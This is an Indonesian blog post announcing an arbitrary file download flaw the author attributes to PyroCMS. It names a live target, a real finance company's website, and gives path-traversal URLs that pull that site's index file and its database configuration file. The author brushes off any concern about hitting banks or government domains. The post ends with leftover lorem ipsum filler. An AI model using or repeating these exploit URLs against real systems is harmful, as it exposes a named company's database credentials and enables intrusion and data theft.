PyroCMS - Arbitrary File Download


-

Hai sobat.

Saya ikal.

Disini saya akan share bug afd lagi :D.

-


Kali ini bug terdapat di CMS yang mungkin banyak dikenal oleh web dev indonesia, yaitu PyroCMS .


Langsung saja.

Live target :

https://bnimultifinance.co.id/bmfapp/prosses/download.php?filename=


BNI? Ora urus mau BNI atau bahkan BSSN atau bahkan domain² besar aku tidak peduli :D


Exploitation to get Index file : 

https://bnimultifinance.co.id/bmfapp/prosses/download.php?filename=../../id/index.php


Exploitation to get Config file : 

https://bnimultifinance.co.id/bmfapp/prosses/download.php?filename=../../id/system/cms/config/database.php


Mungkin Segini aja.

Bagi yang belum mengerti, silakan baca artikel sebelumnya.

Thanks

See u

Tags:
Haikal_

Lorem ipsum dolor sit amet, consectetur adipiscing elit. Morbi eu sem ultrices, porttitor mi eu, euismod ante. Maecenas vitae velit dignissim velit rutrum gravida sit amet eget risus. Donec sit amet mollis nisi, nec commodo est.